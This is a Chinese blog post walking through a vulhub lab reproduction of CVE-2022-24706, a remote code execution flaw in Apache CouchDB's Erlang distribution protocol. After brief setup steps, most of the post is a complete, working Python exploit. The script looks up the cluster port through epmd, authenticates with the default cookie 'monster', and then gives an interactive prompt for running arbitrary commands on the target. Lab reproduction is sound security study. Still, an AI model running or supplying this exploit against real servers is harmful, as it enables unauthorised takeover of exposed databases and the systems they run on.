CouchDB Erlang 分布式协议代码执行 (CVE-2022-24706) vulhub漏洞复现

最新推荐文章于 2024-07-20 23:45:30 发布
最新推荐文章于 2024-07-20 23:45:30 发布
阅读量427 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: couchdb erlang 分布式 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/131818955
版权

CouchDB Erlang 分布式协议代码执行 (CVE-2022-24706)

Apache CouchDB是一个Erlang开发的NoSQL数据库。

由于Erlang的特性,其支持分布式计算,分布式节点之间通过Erlang/OTP Distribution协议进行通信。攻击者如果知道通信时使用的Cookie,即可在握手包通过认证并执行任意命令。

在CouchDB 3.2.1及以前版本中,使用了默认Cookie,值为“monster”。

漏洞复现

cd vulhub-master/

cd couchdb/

cd CVE-2022-24706/

docker-compose up -d

服务启动后,会监听三个端口:

  • 5984: Apache CouchDB Web管理接口
  • 4369: Erlang端口映射服务(epmd)
  • 9100: 集群节点通信和运行时自省服务(代码执行实际发生在这个端口中)

不知道为什么5984是这样的

在这里插入图片描述

不过不用管,此漏洞只经过4369和9100。

使用如下poc,该poc可以通过目标的4369端口epmd服务获取集群通信的端口,就是9100,再使用默认Cookie来控制节点执行任意命令。

# Exploit Title: Remote Command Execution via Erlang Distribution Protocol 
# Date: 2022-01-21
# Exploit Author: Konstantin Burov, @_sadshade
# Software Link: https://www.erlang.org/doc/apps/erts/erl_dist_protocol.html
# Version: N/A
# Tested on: Kali 2021.2
# Based on 1F98D's Erlang Cookie - Remote Code Execution
# Shodan: port:4369 "name "
# References:
#  https://www.exploit-db.com/exploits/49418
#  https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
#  https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce
# 
#
#!/usr/local/bin/python3

import socket
from hashlib import md5
import struct
import sys
import re
import time

TARGET = sys.argv[1]
EPMD_PORT = int(sys.argv[2]) # Default Erlang distributed port
COOKIE = "monster" # Default Erlang cookie for CouchDB 
ERLNAG_PORT = 0
EPM_NAME_CMD = b"\x00\x01\x6e" # Request for nodes list

# Some data:
NAME_MSG  = b"\x00\x15n\x00\x05\x00\x07\x49\x9cAAAAAA@AAAAAAA"
CHALLENGE_REPLY = b"\x00\x15r\x01\x02\x03\x04"
CTRL_DATA  = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03"
CTRL_DATA += b"\x00\x00\x00\x00\x00w\x00w\x03rex"


def compile_cmd(CMD):
    MSG  = b"\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00"
    MSG += b"\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k"
    MSG += struct.pack(">H", len(CMD))
    MSG += bytes(CMD, 'ascii')
    MSG += b'jw\x04user'
    PAYLOAD = b'\x70' + CTRL_DATA + MSG
    PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD
    return PAYLOAD

print("Remote Command Execution via Erlang Distribution Protocol.\n")

# Connect to EPMD:
try:
    epm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    epm_socket.connect((TARGET, EPMD_PORT))
except socket.error as msg:
    print("Couldnt connect to EPMD: %s\n terminating program" % msg)
    sys.exit(1)
    
epm_socket.send(EPM_NAME_CMD) #request Erlang nodes
if epm_socket.recv(4) == b'\x00\x00\x11\x11': # OK
    data = epm_socket.recv(1024)
    data = data[0:len(data) - 1].decode('ascii')
    data = data.split("\n")
    if len(data) == 1:
        choise = 1
        print("Found " + data[0])
    else:
        print("\nMore than one node found, choose which one to use:")
        line_number = 0
        for line in data:
            line_number += 1
            print(" %d) %s" %(line_number, line))
        choise = int(input("\n> "))
        
    ERLNAG_PORT = int(re.search("\d+$",data[choise - 1])[0])
else:
    print("Node list request error, exiting")
    sys.exit(1)
epm_socket.close()

# Connect to Erlang port:
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((TARGET, ERLNAG_PORT))
except socket.error as msg:
    print("Couldnt connect to Erlang server: %s\n terminating program" % msg)
    sys.exit(1)
   
s.send(NAME_MSG)
s.recv(5)
challenge = s.recv(1024)     # Receive "challenge" message
print(challenge)
challenge = struct.unpack(">I", challenge[9:13])[0]

#print("Extracted challenge: {}".format(challenge))

# Add Challenge Digest
CHALLENGE_REPLY += md5(bytes(COOKIE, "ascii")
    + bytes(str(challenge), "ascii")).digest()
s.send(CHALLENGE_REPLY)
CHALLENGE_RESPONSE = s.recv(1024)

if len(CHALLENGE_RESPONSE) == 0:
    print("Authentication failed, exiting")
    sys.exit(1)

print("Authentication successful")
print("Enter command:\n")

data_size = 0
while True:
    if data_size <= 0:
        CMD = input("> ")
        if not CMD:
            continue
        elif CMD == "exit":
            sys.exit(0)
        s.send(compile_cmd(CMD))
        data_size = struct.unpack(">I", s.recv(4))[0] # Get data size
        s.recv(45)              # Control message
        data_size -= 45         # Data size without control message
        time.sleep(0.1)
    elif data_size < 1024:        
        data = s.recv(data_size)
        #print("S---data_size: %d, data_recv_size: %d" %(data_size,len(data)))
        time.sleep(0.1)
        print(data[3:].decode())
        data_size = 0
    else:        
        data = s.recv(1024)
        #print("L---data_size: %d, data_recv_size: %d" %(data_size,len(data)))
        time.sleep(0.1)
        print(data[4:].decode())
        data_size -= 1024

执行该poc可进行任意命令执行
在这里插入图片描述

芝士土包鼠
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
RabbitMQ 端口号解析
a688256的博客
11-01 2163
端口号解析 12345 - 4369 (epmd), 25672 (Erlang distribution)- 5672, 5671 (AMQP 0-9-1 without and with TLS)- 15672 (if management plugin is enabled)- 61613, 61614 (if STOMP is enab...
Apache CouchDB信息泄露漏洞(CVE-2023-26268)通告
05-05
Apache CouchDB 信息泄露漏洞(CVE-2023-26268)通告 Apache CouchDB 是一个开源的 NoSQL 文档数据库,以基于 JSON 的文档格式收集和存储数据,提供了高可用性和高可靠性。近日,深信服安全团队监测到 Apache ...
Apache CouchDB 代码执行漏洞(CVE-2022-24706 )批量POC
苏落is菜鸡的博客
06-11 1928
CVE-2022-24706漏洞是由于3.2.2 版本之前的 CouchDB 的默认配置存在缺陷点, 攻击者可以在未进行身份验证的情况下访问不正确的默认安装进而获得管理员权限。该漏洞影响范围小,建议用户在所有 CouchDB 安装之前安装防火墙。完整的CouchDB api 在注册端口“5984”上可用,这是唯一的需要为单节点安装公开的端口。...
每日一漏洞cve-2022-24706
jjjj1029056414的博客
07-14 289
复现cve-2022-24706CouchDB Erlang代码执行
漏洞复现CVE-2022-24706 CouchDB Erlang 分布式协议代码执行
m0_53121608的博客
07-13 641
漏洞复现CVE-2022-24706 CouchDB Erlang 分布式协议代码执行
Apache CouchDB 远程代码执行漏洞风险通告(CVE-2022-24706
云加速
05-01 765
Apachecouchdb官方发布安全通告,公告中修复了一个远程代码执行漏洞漏洞编号CVE-2022-24706。可导致远程攻击者获得管理员权限等危害。 为避免您的业务受影响,腾讯云安全建议您及时开展安全自查,如在受影响范围,请您及时进行更新修复,避免被外部攻击者入侵。漏洞详情Apache CouchDB数据库,它类似于Redis,Cassandra和MongoDB,也是一个NoSQL数据库。 CouchDB将数据存储为非关系性的JSON文档。 这使得CouchDB的用户可以以与现实世界相似的方式来存..
服务攻防-数据库-cve复现
m0_74402888的博客
07-20 854
在`v3.2.2`版本之前的`Apache CouchDB`中,可以在不进行身份验证的情况下访问不正确的默认安装并获得管理员权限,进而实现。
CVE-2022-24706 Apache CouchDB 远程命令执行漏洞
include_voidmain的博客
07-14 2585
CVE-2022-24706 Apache CouchDB 远程命令执行漏洞
消息中间件RabbitMQ需要知道的6个端口的作用
i++;
03-06 1万+
端口 作用 15672 管理界面ui使用的端口 15671 管理监听端口 5672,5671 AMQP 0-9-1 without and with TLSclient端通信口 4369 (epmd)epmd代表 Erlang端口映射守护进程,erlang发现口 25672 ( Erlang distribution) server间内部通信口 官网介绍(官网端...
ouchdb:一个ErlangElixir CouchDB客户端
02-03
通过`couchdb-master`这个文件,我们可以进一步研究`ouchdb`的源码,了解其实现细节和最佳实践。 总的来说,`ouchdb`是Erlang和Elixir开发者与CouchDB交互的理想选择,它简化了操作流程,提升了开发效率,使得...
couchdb-github-action:在Github Action上运行CouchDB
02-05
CouchDB-Github-Action是将开源文档数据库CouchDB集成到GitHub Actions中的工具,它使得开发者能够在持续集成(Continuous Integration, CI)流程中利用CouchDB进行测试、部署和其他数据库相关的任务。GitHub ...
guile-couchdb:指导方案的Couchdb
02-04
1. 连接CouchDB:通过`make-couchdb-client`函数建立到CouchDB服务器的连接,指定URL和认证信息。 2. 创建数据库:使用`create-database`函数创建一个新的数据库,如`create-database '("mydb")`。 3. 存储文档:将...
解密RabbitMQ:你所不知道的端口及其重要性
todoitbo的博客
10-11 6285
解密RabbitMQ:你所不知道的端口及其重要性
Goby漏洞更新|Apache CouchDB 未认证远程代码执行漏洞 (CVE-2022-24706)
m0_46699477的博客
04-17 266
CVE-2023-24706 Apache CouchDB是美国阿帕奇(Apache)基金会的使用Erlang开发的一套面向文档的数据库系统。Apache CouchDB 3.2.2 之前存在访问控制错误漏洞,该漏洞源于攻击者可以在不进行身份验证的情况下访问不正确的默认安装并获得管理员权限。
RabbitMQ学习笔记:端口号解析(Port Access)
OceanSky的专栏
12-10 4446
1.端口4369:epmd,RabbitMQ节点和CLI工具使用的对等发现服务端口 EPMD与节点间相互通信 epmd(Erlang Port Mapping Daemon)是一个小的附加守护进程,与每个RabbitMQ节点一起运行,运行时使用它来发现特定节点监听端口。然后,对等节点和CLI工具使用该端口。 当一个节点或CLI工具需要连接节点rabbit@hostname2时,它将执行以下操作: ...
Erlang版TCP服务器对抗攻击解决方案
Sunface撩技术
06-07 1931
互联网上的TCP服务器面对的环境情况比企业私有的服务器要复杂很多。常见的针对tcp服务器的攻击有以下几种: 1. 伪造协议,导致服务器crash. 比如说某条命令的字段长度,协议最大规定是1024,伪造个4096的。 2. 伪造大的报文,比如说一个包有1024M这么大。 3. 消耗服务器资源。开大量的连接, 以龟速发送报文,比如说每分钟一个字节。 4. DDOS攻击,从不同的IP发起大量的
RabbitMQ学习笔记:4369、5672、15672、25672默认端口号修改
热门推荐
OceanSky的专栏
12-17 4万+
1.默认5672端口号修改 第一种方法: 在/etc/rabbitmq/rabbitmq.conf配置文件中加上如下配置: listeners.tcp.default = 5673 或者 [ {rabbit, [ {tcp_listeners, [5673]} ] } ] 上面的示例将更改RabbitMQ监听AMQP0-9-1和AMQP 1.0协议客户端的连接端口从...
服务攻防_01数据库安全Redis&Couchdb&H2database
最新发布
fencecat的博客
07-20 975
本节内容涵盖了对几种常见数据库可能存在的安全漏洞进行复现的方法,包括Redis的未授权访问与已知CVE漏洞CouchDB的未授权越权漏洞与已知CVE漏洞,以及H2 Database的未授权访问漏洞与已知CVE漏洞
6f940c91ee6c hyperledger/fabric-couchdb "tini -- /docker-e..." 4 days ago Up 4 days 4369/tcp, 9100/tcp, 0.0.0.0:5984->5984/tcp couchdb0 b38fcba5811f hyperledger/fabric-couchdb "tini -- /docker-e..." 4 days ago Up 4 days 4369/tcp, 9100/tcp, 0.0.0.0:8984->5984/tcp couchdb3 f35978830422 hyperledger/fabric-couchdb "tini -- /docker-e..." 4 days ago Up 4 days 4369/tcp, 9100/tcp, 0.0.0.0:6984->5984/tcp couchdb1
05-24
这是一个运行了三个 CouchDB 容器的 Docker 服务。这些容器的镜像来自于 Hyperledger Fabric 项目,用于支持区块链网络的数据存储和查询。每个容器都暴露了不同的端口,其中 5984 是 CouchDB 的默认端口,8984 和 6984 是自定义的端口。容器分别命名为 couchdb0、couchdb1 和 couchdb3。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值